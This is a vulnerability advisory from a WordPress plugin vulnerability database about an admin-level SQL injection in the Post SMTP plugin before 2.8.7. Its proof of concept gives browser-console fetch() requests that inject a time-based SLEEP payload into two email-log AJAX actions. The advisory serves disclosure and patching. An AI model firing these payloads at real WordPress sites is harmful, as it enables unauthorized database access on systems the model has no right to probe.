WordPress Plugin Vulnerabilities
Post SMTP < 2.8.7 - Admin+ SQL Injection
Description
The plugin does not properly sanitise and escape several parameters before using them in SQL statements, leading to a SQL injection exploitable by high privilege users such as admin.
Proof of Concept
# In `ps-delete-email-logs` action: Visit the Post SMTP > Email Log page and run the following code in the browser console: nonce = document.getElementById('ps-email-log-nonce').value await fetch("/wp-admin/admin-ajax.php", { "credentials": "include", "headers": { "Content-Type": "application/x-www-form-urlencoded", "Sec-Fetch-Site": "same-origin" }, "body": "action=ps-delete-email-logs&security=" + nonce + "&selected%5B%5D=1)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)#", "method": "POST", "mode": "cors" }); # In `ps-export-email-logs` action: Visit the Post SMTP > Email Log page and run the following code in the browser console: nonce = document.getElementById('ps-email-log-nonce').value await fetch("/wp-admin/admin-ajax.php", { "credentials": "include", "headers": { "Content-Type": "application/x-www-form-urlencoded", "Sec-Fetch-Site": "same-origin" }, "body": "action=ps-export-email-logs&security=" + nonce + "&selected%5B%5D=1)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)#", "method": "POST", "mode": "cors" });
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-12-21 (about 4 months ago)
Added
2023-12-21 (about 4 months ago)
Last Updated
2023-12-21 (about 4 months ago)